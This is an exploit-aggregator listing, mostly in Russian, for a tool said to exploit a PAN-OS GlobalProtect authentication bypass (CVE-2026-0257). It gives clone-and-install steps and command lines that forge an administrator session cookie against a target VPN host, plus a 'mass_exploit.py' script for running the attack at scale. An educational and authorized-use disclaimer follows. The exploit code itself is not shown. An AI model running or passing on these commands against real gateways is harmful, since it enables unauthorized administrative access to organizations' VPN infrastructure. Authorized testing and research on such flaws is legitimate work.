Sploitus

Exploit for CVE-2026-0257

kitploit · 2026-08-25

Exploit Code

MARKDOWN142 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2026-0257
# CVE-2026-0257

Уязвимость обхода аутентификации PAN-OS GlobalProtect

* * *

## ⚡ Простое использование

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  * Локальные виртуальные машины
  * Docker-контейнеры
  * Изолированные лабораторные стенды
  * Авторизованные среды тестирования на проникновение



Пример настройки:

root@kitploit:~
    
    
    git clone https://github.com/HORKimhab/CVE-2026-0257
    cd CVE-2026-0257
    
    # Create virtual environment 
    python -m venv venv 
    
    # Active virtual environment  
    
    # Linux / macOS: 
    source venv/bin/activate
    
    # Windows
    venv\Scripts\activate
    
    # Install requirments 
    pip install -r requirements.txt
    

Пример использования:

root@kitploit:~
    
    
    # Single target 
    # Basic usage
    python forge_cookie.py --target 192.168.1.100 --user admin
    
    # Advanced usage
    python forge_cookie.py --target vpn.company.com \
                           --port 443 \
                           --user administrator \
                           --context both \
                           --verbose
    
    # Max exploit 
    python mass_exploit.py
    
    

* * *

## Источники и ссылки

  * https://github.com/sfewer-r7/CVE-2026-0257
  * https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257/



* * *

# 📚 Образовательный репозиторий по исследованиям в области безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.

* * *

## ⚠️ Дисклеймер о безопасности и правовых аспектах

## Назначение

Этот репозиторий предназначен **только для образовательных и авторизованных исследований в области безопасности**.

Он создан, чтобы помочь пользователям узнать о:

  * Уязвимостях безопасности
  * Концепциях песочниц и изоляции
  * Безопасном кодировании и защитных практиках



* * *

## Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, например:

  * Личные лаборатории или виртуальные машины
  * Docker или изолированные среды
  * Авторизованное тестирование на проникновение
  * Обучение кибербезопасности или академические исследования



Несанкционированное или незаконное использование строго запрещено.

* * *

## Отсутствие ответственности

Автор и участники **не несут ответственности** за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  * Вы несёте ответственность за свои действия
  * Вы будете использовать его законно и этично
  * Проект предоставляется **без каких-либо гарантий**



* * *

## Этичное использование

Этот проект предназначен для:

  * Исследований в области защитной безопасности
  * Образования в сфере кибербезопасности
  * Повышения осведомлённости об уязвимостях
  * Исследований безопасных систем и программного обеспечения



Пожалуйста, следуйте практикам ответственного раскрытия уязвимостей и соблюдайте все применимые законы.

* * *

## Контакты

Для ответственного раскрытия уязвимостей или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.